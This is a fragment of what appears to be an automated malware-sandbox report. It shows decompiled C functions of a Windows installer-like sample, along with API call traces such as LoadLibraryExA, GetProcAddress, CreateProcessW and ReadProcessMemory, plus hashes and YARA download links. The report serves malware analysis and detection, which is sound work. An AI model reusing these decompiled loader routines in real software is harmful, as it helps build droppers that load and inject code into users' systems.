                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,0040B8A0,0041D460,00004000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF), ref: 00403401
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FilePointer$CountTick
                                                                                                                                                                                                          • String ID: `TA
                                                                                                                                                                                                          • API String ID: 1092082344-1754987364
                                                                                                                                                                                                          • Opcode ID: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                                                                                                                                                          • Instruction ID: bb82d22d1a80a93a7495f99719332701a8bc5653d470bc60fdd2df8261a6fa09
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A31B3726042159FDB10BF29EE849263BACFB40359B88813BE405B62F1C7785C428A9D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                                                          			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f518");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4e8 =  *0x42f4e8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00405374(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b890, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403A00(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                                                                                                                          0x0040209d
                                                                                                                                                                                                          0x0040209d
                                                                                                                                                                                                          0x004020a2
                                                                                                                                                                                                          0x004020a9
                                                                                                                                                                                                          0x00402164
                                                                                                                                                                                                          0x004022dd
                                                                                                                                                                                                          0x004022dd
                                                                                                                                                                                                          0x00402a5a
                                                                                                                                                                                                          0x00402a5d
                                                                                                                                                                                                          0x00402a69
                                                                                                                                                                                                          0x00402a69
                                                                                                                                                                                                          0x004020b8
                                                                                                                                                                                                          0x004020c2
                                                                                                                                                                                                          0x004020c5
                                                                                                                                                                                                          0x004020d4
                                                                                                                                                                                                          0x004020d8
                                                                                                                                                                                                          0x004020de
                                                                                                                                                                                                          0x004020e2
                                                                                                                                                                                                          0x0040215d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040215d
                                                                                                                                                                                                          0x004020e4
                                                                                                                                                                                                          0x004020ed
                                                                                                                                                                                                          0x004020f1
                                                                                                                                                                                                          0x00402135
                                                                                                                                                                                                          0x004020f3
                                                                                                                                                                                                          0x004020f6
                                                                                                                                                                                                          0x004020f9
                                                                                                                                                                                                          0x00402129
                                                                                                                                                                                                          0x004020fb
                                                                                                                                                                                                          0x004020fe
                                                                                                                                                                                                          0x00402107
                                                                                                                                                                                                          0x00402109
                                                                                                                                                                                                          0x00402109
                                                                                                                                                                                                          0x00402107
                                                                                                                                                                                                          0x004020f9
                                                                                                                                                                                                          0x0040213d
                                                                                                                                                                                                          0x00402152
                                                                                                                                                                                                          0x00402152
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040213d
                                                                                                                                                                                                          0x004020c8
                                                                                                                                                                                                          0x004020ce
                                                                                                                                                                                                          0x004020d2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                                                                                                                                            • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430
                                                                                                                                                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 004020E8
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,00000000,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2987980305-0
                                                                                                                                                                                                          • Opcode ID: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                                                                                                                                                          • Instruction ID: e3fe6dffd4d776efa863efd9403cf6e1974d247a329121c392e1043855ccd094
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2721EE32A00115EBCF20BF648F49B9F76B1AF14359F20423BF651B61D1CBBC49829A5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                          			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405C7E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405C10(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004058B7(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D4(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E0040583A(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040624D("C:\\Users\\Albus\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                                                                                                                                                          0x004015bb
                                                                                                                                                                                                          0x004015c2
                                                                                                                                                                                                          0x004015c5
                                                                                                                                                                                                          0x004015ca
                                                                                                                                                                                                          0x004015ce
                                                                                                                                                                                                          0x004015d0
                                                                                                                                                                                                          0x004015d8
                                                                                                                                                                                                          0x004015da
                                                                                                                                                                                                          0x004015dc
                                                                                                                                                                                                          0x004015e0
                                                                                                                                                                                                          0x004015e3
                                                                                                                                                                                                          0x004015fb
                                                                                                                                                                                                          0x004015fc
                                                                                                                                                                                                          0x004015e5
                                                                                                                                                                                                          0x004015e5
                                                                                                                                                                                                          0x004015e8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004015f3
                                                                                                                                                                                                          0x004015f4
                                                                                                                                                                                                          0x004015f4
                                                                                                                                                                                                          0x004015e8
                                                                                                                                                                                                          0x00401603
                                                                                                                                                                                                          0x0040160a
                                                                                                                                                                                                          0x00401617
                                                                                                                                                                                                          0x00401617
                                                                                                                                                                                                          0x0040160c
                                                                                                                                                                                                          0x0040160d
                                                                                                                                                                                                          0x00401615
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401615
                                                                                                                                                                                                          0x0040160a
                                                                                                                                                                                                          0x0040161a
                                                                                                                                                                                                          0x0040161d
                                                                                                                                                                                                          0x0040161f
                                                                                                                                                                                                          0x00401620
                                                                                                                                                                                                          0x004015d0
                                                                                                                                                                                                          0x00401627
                                                                                                                                                                                                          0x00401652
                                                                                                                                                                                                          0x004022dd
                                                                                                                                                                                                          0x00401629
                                                                                                                                                                                                          0x0040162b
                                                                                                                                                                                                          0x00401636
                                                                                                                                                                                                          0x0040163c
                                                                                                                                                                                                          0x00401644
                                                                                                                                                                                                          0x0040164a
                                                                                                                                                                                                          0x0040164a
                                                                                                                                                                                                          0x00401644
                                                                                                                                                                                                          0x00402a5d
                                                                                                                                                                                                          0x00402a69

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00405C7E: CharNextA.USER32(?), ref: 00405C8C
                                                                                                                                                                                                            • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405C91
                                                                                                                                                                                                            • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405CA5
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                                                                                                            • Part of subcall function 0040583A: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                                                                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                          • API String ID: 1892508949-2935972921
                                                                                                                                                                                                          • Opcode ID: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                                                                                                                                                          • Instruction ID: 4524d263cfc656ab508a586836abab8f1c5f66e1bf0f475862462bf062351d6a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7110832108141EBDB307FA54D409BF37B49A92314B28457FE591B22E3D63C4942962E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 722F3034, Relevance: 5.1, APIs: 3, Instructions: 555processCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateProcessW.KERNEL32(?,00000000), ref: 722F337D
                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 722F33C4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167863165.00000000722F3000.00000040.00020000.sdmp, Offset: 722F0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167849303.00000000722F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167854070.00000000722F1000.00000080.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167858720.00000000722F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167867973.00000000722F5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$CreateMemoryRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2726527582-0
                                                                                                                                                                                                          • Opcode ID: 336b3eaefdafa4c325ec6c7ec43c8978254d40ff6472ec0be642d855be60ce94
                                                                                                                                                                                                          • Instruction ID: 636f72560d9ffe208ff8805335adc39afe28c427f475bc4384b6161768230fa6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 336b3eaefdafa4c325ec6c7ec43c8978254d40ff6472ec0be642d855be60ce94
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95323671E54249AEEB10CFA8DC45FADFBB5BF08704F10409AE609FA2A4D7749A80CF15
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004031B7, Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                          			E004031B7(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42f4b8;
					 *0x429464 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E004032BF(4);
				if(_t22 >= 0) {
					_t24 = E00405E5E( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x429464 =  *0x429464 + 4;
						_t36 = E004032BF(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x429464 =  *0x429464 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405E5E( *0x40a01c, 0x41d460, _t28) == 0) {
											goto L18;
										}
										_t30 = E00405E8D(_a8, 0x41d460, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x429464 =  *0x429464 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                                                                                                                                                                                          0x004031bb
                                                                                                                                                                                                          0x004031c4
                                                                                                                                                                                                          0x004031cd
                                                                                                                                                                                                          0x004031d1
                                                                                                                                                                                                          0x004031dc
                                                                                                                                                                                                          0x004031dc
                                                                                                                                                                                                          0x004031e4
                                                                                                                                                                                                          0x004031eb
                                                                                                                                                                                                          0x004031fd
                                                                                                                                                                                                          0x00403204
                                                                                                                                                                                                          0x004032a9
                                                                                                                                                                                                          0x004032a9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040320a
                                                                                                                                                                                                          0x0040320d
                                                                                                                                                                                                          0x00403219
                                                                                                                                                                                                          0x0040321d
                                                                                                                                                                                                          0x004032b7
                                                                                                                                                                                                          0x004032b7
                                                                                                                                                                                                          0x00403223
                                                                                                                                                                                                          0x00403226
                                                                                                                                                                                                          0x00403285
                                                                                                                                                                                                          0x0040328b
                                                                                                                                                                                                          0x0040328d
                                                                                                                                                                                                          0x0040328d
                                                                                                                                                                                                          0x0040329f
                                                                                                                                                                                                          0x004032a7
                                                                                                                                                                                                          0x004032ae
                                                                                                                                                                                                          0x004032b1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403228
                                                                                                                                                                                                          0x0040322b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403231
                                                                                                                                                                                                          0x00403236
                                                                                                                                                                                                          0x0040323d
                                                                                                                                                                                                          0x00403240
                                                                                                                                                                                                          0x00403242
                                                                                                                                                                                                          0x00403242
                                                                                                                                                                                                          0x0040324f
                                                                                                                                                                                                          0x00403259
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403262
                                                                                                                                                                                                          0x00403269
                                                                                                                                                                                                          0x00403281
                                                                                                                                                                                                          0x004032ab
                                                                                                                                                                                                          0x004032ab
                                                                                                                                                                                                          0x0040326b
                                                                                                                                                                                                          0x0040326b
                                                                                                                                                                                                          0x0040326e
                                                                                                                                                                                                          0x00403271
                                                                                                                                                                                                          0x00403277
                                                                                                                                                                                                          0x0040327d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040327f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040327f
                                                                                                                                                                                                          0x0040327d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403269
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403236
                                                                                                                                                                                                          0x0040322b
                                                                                                                                                                                                          0x00403226
                                                                                                                                                                                                          0x0040321d
                                                                                                                                                                                                          0x00403204
                                                                                                                                                                                                          0x004032b9
                                                                                                                                                                                                          0x004032bc

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004031DC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                          • Opcode ID: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
                                                                                                                                                                                                          • Instruction ID: f7a06b24e1bdd84e59f3f5cc49a67b6726d22d07d12c3136825aaea33ef0281b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91318D70200218EFDB109F95DD44A9A3BACEB04759F1044BEF905E61A0D3389E51DBA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                                                                                          			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f490;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec2c =  *0x42ec2c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec2c, 0x7530,  *0x42ec14), 0);
					}
				}
				return 0;
			}











                                                                                                                                                                                                          0x0040138a
                                                                                                                                                                                                          0x004013fa
                                                                                                                                                                                                          0x0040139b
                                                                                                                                                                                                          0x004013a0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004013a2
                                                                                                                                                                                                          0x004013a3
                                                                                                                                                                                                          0x004013ad
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401404
                                                                                                                                                                                                          0x004013b0
                                                                                                                                                                                                          0x004013b7
                                                                                                                                                                                                          0x004013bd
                                                                                                                                                                                                          0x004013be
                                                                                                                                                                                                          0x004013c0
                                                                                                                                                                                                          0x004013c2
                                                                                                                                                                                                          0x004013b9
                                                                                                                                                                                                          0x004013b9
                                                                                                                                                                                                          0x004013ba
                                                                                                                                                                                                          0x004013ba
                                                                                                                                                                                                          0x004013c9
                                                                                                                                                                                                          0x004013cb
                                                                                                                                                                                                          0x004013f4
                                                                                                                                                                                                          0x004013f4
                                                                                                                                                                                                          0x004013c9
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                          • Opcode ID: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                                                                                                                                                          • Instruction ID: 4ffa91c62993149d5f3561e9fd219417dede2ec5d116c30815b8555db40bf4f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 480121317242109BE7184B7A8D04B6A32A8E710318F10853AF841F61F1DA789C028B4C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406656, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00406656(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065E8(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                                                                                                                          0x0040665e
                                                                                                                                                                                                          0x00406661
                                                                                                                                                                                                          0x00406668
                                                                                                                                                                                                          0x00406670
                                                                                                                                                                                                          0x0040667c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406683
                                                                                                                                                                                                          0x00406673
                                                                                                                                                                                                          0x0040667a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040668b
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,004034F9,0000000B), ref: 00406683
                                                                                                                                                                                                            • Part of subcall function 004065E8: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065FF
